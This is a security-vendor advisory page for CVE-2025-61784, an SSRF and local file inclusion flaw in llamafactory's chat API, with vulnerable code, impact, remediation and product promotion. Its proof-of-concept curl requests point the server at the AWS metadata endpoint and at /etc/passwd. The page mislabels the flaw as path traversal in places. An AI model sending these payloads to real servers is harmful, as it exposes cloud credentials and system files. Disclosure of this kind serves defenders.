CVE-2025-61784

CVE-2025-61784 is a high-severity path traversal vulnerability in llamafactory (pip), affecting versions <= 0.9.3. It is fixed in 0.9.4.

Summary

Summary

A Server-Side Request Forgery (SSRF) vulnerability in the chat API allows any authenticated user to force the server to make arbitrary HTTP requests to internal and external networks. This can lead to the exposure of sensitive internal services, reconnaissance of the internal network, or interaction with third-party services. The same mechanism also allows for a Local File Inclusion (LFI) vulnerability, enabling users to read arbitrary files from the server's filesystem.

Details

The vulnerability exists in the _process_request function within src/llamafactory/api/chat.py. This function is responsible for processing incoming multimodal content, including images, videos, and audio provided via URLs.

The function checks if the provided URL is a base64 data URI or a local file path (os.path.isfile). If neither is true, it falls back to treating the URL as a web URI and makes a direct HTTP GET request using requests.get(url, stream=True).raw without any validation or sanitization of the URL.

Vulnerable Code Snippets in _process_request:

# ...
        elif input_item.type == "image_url":
            # ...
            else:  # web uri
                image_stream = requests.get(image_url, stream=True).raw
# ...
        elif input_item.type == "video_url":
            # ...
            else:  # web uri
                video_stream = requests.get(video_url, stream=True).raw
# ...
        elif input_item.type == "audio_url":
            # ...
            else:  # web uri
                audio_stream = requests.get(audio_url, stream=True).raw
# ...

This vulnerable function is called by create_chat_completion_response and create_stream_chat_completion_response, which are in turn called by the public-facing /v1/chat/completions API endpoint in src/llamafactory/api/app.py. A user can craft a request to this endpoint containing a malicious URL in the messages payload to trigger the vulnerability.

PoC

To reproduce the vulnerability, send a POST request to the /v1/chat/completions endpoint with a JSON payload containing a URL that points to an internal or controlled external service.

Start the LLaMA Factory API server.

Use curl to send the malicious request. The following example uses a URL pointing to the AWS metadata service, a common SSRF attack vector.

SSRF Payload:

curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_api_key" \
-d '{
  "model": "your-model-name",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "What is in this image?"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "http://169.254.169.254/latest/meta-data/"
          }
        }
      ]
    }
  ]
}'

LFI Payload:

curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_api_key" \
-d '{
  "model": "your-model-name",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "What is in this image?"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "/etc/passwd"
          }
        }
      ]
    }
  ]
}'

The server will make a request to the specified URL or read the specified local file.

Impact

Vulnerability Type: Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI).

Impacted Component: The API server, specifically the /v1/chat/completions endpoint.

Who is impacted: Any user who can send requests to the chat API. The vulnerability allows an attacker to bypass firewalls and access internal network resources, query cloud metadata services for credentials, or read sensitive files on the server. The severity is critical.

Credits

Wenhao Wu, ChengGao, Alibaba Cloud Intelligence Security Team

Impact

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2025-61784 has a CVSS score of 7.6 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.9.4); upgrading removes the vulnerable code path.

Affected versions

llamafactory (<= 0.9.3)

Security releases

llamafactory → 0.9.4 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade llamafactory to 0.9.4 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2025-61784? CVE-2025-61784 is a high-severity path traversal vulnerability in llamafactory (pip), affecting versions <= 0.9.3. It is fixed in 0.9.4. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2025-61784? CVE-2025-61784 has a CVSS score of 7.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of llamafactory are affected by CVE-2025-61784? llamafactory (pip) versions <= 0.9.3 is affected.
  4. Is there a fix for CVE-2025-61784? Yes. CVE-2025-61784 is fixed in 0.9.4. Upgrade to this version or later.
  5. Is CVE-2025-61784 exploitable, and should I be worried? Whether CVE-2025-61784 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2025-61784 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2025-61784? Upgrade llamafactory to 0.9.4 or later.

Other vulnerabilities in llamafactory

CVE-2025-61784CVE-2025-53002CVE-2024-52803

Stop the waste.
Protect your environment with Kodem.